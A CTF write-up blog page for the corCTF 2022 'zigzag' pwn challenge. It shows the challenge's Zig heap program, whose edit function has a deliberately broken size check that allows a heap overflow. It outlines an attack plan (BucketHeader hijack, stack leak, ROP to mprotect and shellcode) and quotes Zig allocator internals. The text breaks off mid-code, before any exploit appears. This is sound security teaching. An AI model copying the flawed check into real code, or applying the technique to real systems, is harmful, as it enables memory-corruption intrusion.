<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[corCTF 2022 - pwn] zigzag | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Introductionzigzag is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap like challenge written in zig. It is not using the C allocator but inste">
<meta property="og:type" content="article">
<meta property="og:title" content="[corCTF 2022 - pwn] zigzag">
<meta property="og:url" content="https://n4sm.github.io/posts/zigzag/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="Introductionzigzag is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap like challenge written in zig. It is not using the C allocator but inste">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-08-07T22:00:00.000Z">
<meta property="article:modified_time" content="2023-09-05T09:45:11.053Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="2022">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="corCTF">
<meta property="article:tag" content="zig">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box"></div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/hello-world/" title="Hello World" >
            <div class="recent-link-text">
              Hello World
            </div>
          </a>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-zigzag" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [corCTF 2022 - pwn] zigzag
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2022-08-07T22:00:00.000Z" itemprop="datePublished">2022-08-07</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            2.8k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2022/" rel="tag">2022</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/corCTF/" rel="tag">corCTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/zig/" rel="tag">zig</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p><code>zigzag</code> is a zig heap challenge I did during the <a target="_blank" rel="noopener" href="https://ctftime.org/event/1656">corCTF 2022</a> event. It was pretty exotic given we have to pwn a heap like challenge written in <a target="_blank" rel="noopener" href="https://ziglang.org/">zig</a>. It is not using the C allocator but instead it uses the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/tree/master/2022/corCTF/pwn/zieg">here</a>.</p>
<h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL; DR"></a>TL; DR</h2><ul>
<li>Understanding zig <code>GeneralPurposeAllocator</code> internals</li>
<li>Hiijack the <code>BucketHeader</code> of a given bucket to get a write what were &#x2F; read what where primitive.</li>
<li>Leak stack + ROP on the fileRead function (mprotect + shellcode)</li>
<li>PROFIT</li>
</ul>
<h2 id="Source-code-analysis"><a href="#Source-code-analysis" class="headerlink" title="Source code analysis"></a>Source code analysis</h2><p>The source code is procided:</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// zig build-exe main.zig -O ReleaseSmall</span></span><br><span class="line"><span class="comment">// built with zig version: 0.10.0-dev.2959+6f55b294f</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> std = @<span class="title function_ invoke__">import</span>(<span class="string">&quot;std&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> fmt = std.fmt;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> stdout = std.io.<span class="title function_ invoke__">getStdOut</span>().<span class="title function_ invoke__">writer</span>();</span><br><span class="line"><span class="keyword">const</span> stdin = std.io.<span class="title function_ invoke__">getStdIn</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> MAX_SIZE: <span class="type">usize</span> = <span class="number">0x500</span>;</span><br><span class="line"><span class="keyword">const</span> ERR: <span class="type">usize</span> = <span class="number">0xbaad0000</span>;</span><br><span class="line"><span class="keyword">const</span> NULL: <span class="type">usize</span> = <span class="number">0xdead0000</span>;</span><br><span class="line"></span><br><span class="line">var chunklist: [<span class="number">20</span>][]<span class="type">u8</span> = undefined;</span><br><span class="line"></span><br><span class="line">var gpa = std.heap.<span class="title function_ invoke__">GeneralPurposeAllocator</span>(.&#123;&#125;)&#123;&#125;;</span><br><span class="line"><span class="keyword">const</span> allocator = gpa.<span class="title function_ invoke__">allocator</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">menu</span>() !void &#123;</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;[1] Add\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;[2] Delete\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;[3] Show\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;[4] Edit\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;[5] Exit\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;&gt; &quot;</span>, .&#123;&#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">readNum</span>() !<span class="type">usize</span> &#123;</span><br><span class="line">    var buf: [<span class="number">64</span>]<span class="type">u8</span> = undefined;</span><br><span class="line">    var stripped: []<span class="keyword">const</span> <span class="type">u8</span> = undefined;</span><br><span class="line">    var amnt: <span class="type">usize</span> = undefined;</span><br><span class="line">    var num: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    amnt = <span class="keyword">try</span> stdin.<span class="title function_ invoke__">read</span>(&amp;buf);</span><br><span class="line">    stripped = std.mem.<span class="title function_ invoke__">trimRight</span>(<span class="type">u8</span>, buf[<span class="number">0</span>..amnt], <span class="string">&quot;\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    num = fmt.<span class="title function_ invoke__">parseUnsigned</span>(<span class="type">usize</span>, stripped, <span class="number">10</span>) catch &#123;</span><br><span class="line">        <span class="keyword">return</span> ERR;</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> num;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">add</span>() !void &#123;</span><br><span class="line">    var idx: <span class="type">usize</span> = undefined;</span><br><span class="line">    var size: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Index: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    idx = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (idx == ERR or idx &gt;= chunklist.len or @<span class="title function_ invoke__">ptrToInt</span>(chunklist[idx].ptr) != NULL) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid index!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Size: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    size = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (size == ERR or size &gt;= MAX_SIZE) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid size!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    chunklist[idx] = <span class="keyword">try</span> allocator.<span class="title function_ invoke__">alloc</span>(<span class="type">u8</span>, size);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Data: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    _ = <span class="keyword">try</span> stdin.<span class="title function_ invoke__">read</span>(chunklist[idx]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">delete</span>() !void &#123;</span><br><span class="line">    var idx: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Index: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    idx = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (idx == ERR or idx &gt;= chunklist.len or @<span class="title function_ invoke__">ptrToInt</span>(chunklist[idx].ptr) == NULL) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid index!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    _ = allocator.<span class="title function_ invoke__">free</span>(chunklist[idx]);</span><br><span class="line"></span><br><span class="line">    chunklist[idx].ptr = @<span class="title function_ invoke__">intToPtr</span>([*]<span class="type">u8</span>, NULL);</span><br><span class="line">    chunklist[idx].len = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">show</span>() !void &#123;</span><br><span class="line">    var idx: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Index: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    idx = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (idx == ERR or idx &gt;= chunklist.len or @<span class="title function_ invoke__">ptrToInt</span>(chunklist[idx].ptr) == NULL) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid index!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;&#123;s&#125;\n&quot;</span>, .&#123;chunklist[idx]&#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">edit</span>() !void &#123;</span><br><span class="line">    var idx: <span class="type">usize</span> = undefined;</span><br><span class="line">    var size: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Index: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    idx = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (idx == ERR or idx &gt;= chunklist.len or @<span class="title function_ invoke__">ptrToInt</span>(chunklist[idx].ptr) == NULL) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid index!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Size: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    size = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (size &gt; chunklist[idx].len and size == ERR) &#123;</span><br><span class="line">        <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Invalid size!\n&quot;</span>, .&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    chunklist[idx].len = size;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> stdout.<span class="title function_ invoke__">print</span>(<span class="string">&quot;Data: &quot;</span>, .&#123;&#125;);</span><br><span class="line">    _ = <span class="keyword">try</span> stdin.<span class="title function_ invoke__">read</span>(chunklist[idx]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">main</span>() !void &#123;</span><br><span class="line">    var choice: <span class="type">usize</span> = undefined;</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">for</span> (chunklist) |_, i| &#123;</span><br><span class="line">        chunklist[i].ptr = @<span class="title function_ invoke__">intToPtr</span>([*]<span class="type">u8</span>, NULL);</span><br><span class="line">        chunklist[i].len = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> <span class="title function_ invoke__">menu</span>();</span><br><span class="line"></span><br><span class="line">        choice = <span class="keyword">try</span> <span class="title function_ invoke__">readNum</span>();</span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == ERR) <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == <span class="number">1</span>) <span class="keyword">try</span> <span class="title function_ invoke__">add</span>();</span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == <span class="number">2</span>) <span class="keyword">try</span> <span class="title function_ invoke__">delete</span>();</span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == <span class="number">3</span>) <span class="keyword">try</span> <span class="title function_ invoke__">show</span>();</span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == <span class="number">4</span>) <span class="keyword">try</span> <span class="title function_ invoke__">edit</span>();</span><br><span class="line">        <span class="title function_ invoke__">if</span> (choice == <span class="number">5</span>) <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>The source code is quite readable, the vulnerability is the overflow within the <code>edit</code> function. The check onto the provided size isn’t efficient, <code>size &gt; chunklist[idx].len and size == ERR</code>, if <code>size &gt; chunklist[idx].len</code> and if <code>size != ERR</code> the condition is false. Which means we can edit the chunk by writing an arbitrary amount of data in it.</p>
<h2 id="GeneralPurposeAllocator-abstract"><a href="#GeneralPurposeAllocator-abstract" class="headerlink" title="GeneralPurposeAllocator abstract"></a>GeneralPurposeAllocator abstract</h2><p>The <a target="_blank" rel="noopener" href="https://github.com/ziglang/zig/">zig</a> source is quite readable so let’s take a look at the internals of the GeneralPurposeAllocator allocator.<br>The GeneralPurposeAllocator is implemented <a target="_blank" rel="noopener" href="https://github.com/ziglang/zig/blob/master/lib/std/heap/general_purpose_allocator.zig">here</a>.<br>The header of the source code file gives the basic design of the allocator:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">//! ## Basic Design:</span><br><span class="line">//!</span><br><span class="line">//! Small allocations are divided into buckets:</span><br><span class="line">//!</span><br><span class="line">//! ```</span><br><span class="line">//! index obj_size</span><br><span class="line">//! 0     1</span><br><span class="line">//! 1     2</span><br><span class="line">//! 2     4</span><br><span class="line">//! 3     8</span><br><span class="line">//! 4     16</span><br><span class="line">//! 5     32</span><br><span class="line">//! 6     64</span><br><span class="line">//! 7     128</span><br><span class="line">//! 8     256</span><br><span class="line">//! 9     512</span><br><span class="line">//! 10    1024</span><br><span class="line">//! 11    2048</span><br><span class="line">//! ```</span><br><span class="line">//!</span><br><span class="line">//! The main allocator state has an array of all the &quot;current&quot; buckets for each</span><br><span class="line">//! size class. Each slot in the array can be null, meaning the bucket for that</span><br><span class="line">//! size class is not allocated. When the first object is allocated for a given</span><br><span class="line">//! size class, it allocates 1 page of memory from the OS. This page is</span><br><span class="line">//! divided into &quot;slots&quot; - one per allocated object. Along with the page of memory</span><br><span class="line">//! for object slots, as many pages as necessary are allocated to store the</span><br><span class="line">//! BucketHeader, followed by &quot;used bits&quot;, and two stack traces for each slot</span><br><span class="line">//! (allocation trace and free trace).</span><br><span class="line">//!</span><br><span class="line">//! The &quot;used bits&quot; are 1 bit per slot representing whether the slot is used.</span><br><span class="line">//! Allocations use the data to iterate to find a free slot. Frees assert that the</span><br><span class="line">//! corresponding bit is 1 and set it to 0.</span><br><span class="line">//!</span><br><span class="line">//! Buckets have prev and next pointers. When there is only one bucket for a given</span><br><span class="line">//! size class, both prev and next point to itself. When all slots of a bucket are</span><br><span class="line">//! used, a new bucket is allocated, and enters the doubly linked list. The main</span><br><span class="line">//! allocator state tracks the &quot;current&quot; bucket for each size class. Leak detection</span><br><span class="line">//! currently only checks the current bucket.</span><br><span class="line">//!</span><br><span class="line">//! Resizing detects if the size class is unchanged or smaller, in which case the same</span><br><span class="line">//! pointer is returned unmodified. If a larger size class is required,</span><br><span class="line">//! `error.OutOfMemory` is returned.</span><br><span class="line">//!</span><br><span class="line">//! Large objects are allocated directly using the backing allocator and their metadata is stored</span><br><span class="line">//! in a `std.HashMap` using the backing allocator.</span><br></pre></td></tr></table></figure>

<p>Let’s take a look at <code>alloc</code> function:</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">fn</span> <span class="title function_">alloc</span>(<span class="keyword">self</span>: *<span class="keyword">Self</span>, len: <span class="type">usize</span>, ptr_align: u29, len_align: u29, ret_addr: <span class="type">usize</span>) Error![]<span class="type">u8</span> &#123;</span><br><span class="line">    <span class="keyword">self</span>.mutex.<span class="title function_ invoke__">lock</span>();</span><br><span class="line">    defer <span class="keyword">self</span>.mutex.<span class="title function_ invoke__">unlock</span>();</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">if</span> (!<span class="keyword">self</span>.<span class="title function_ invoke__">isAllocationAllowed</span>(len)) &#123;</span><br><span class="line">        <span class="keyword">return</span> error.OutOfMemory;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> new_aligned_size = math.<span class="title function_ invoke__">max</span>(len, ptr_align);</span><br><span class="line">    <span class="title function_ invoke__">if</span> (new_aligned_size &gt; largest_bucket_object_size) &#123;</span><br><span class="line">        <span class="keyword">try</span> <span class="keyword">self</span>.large_allocations.<span class="title function_ invoke__">ensureUnusedCapacity</span>(<span 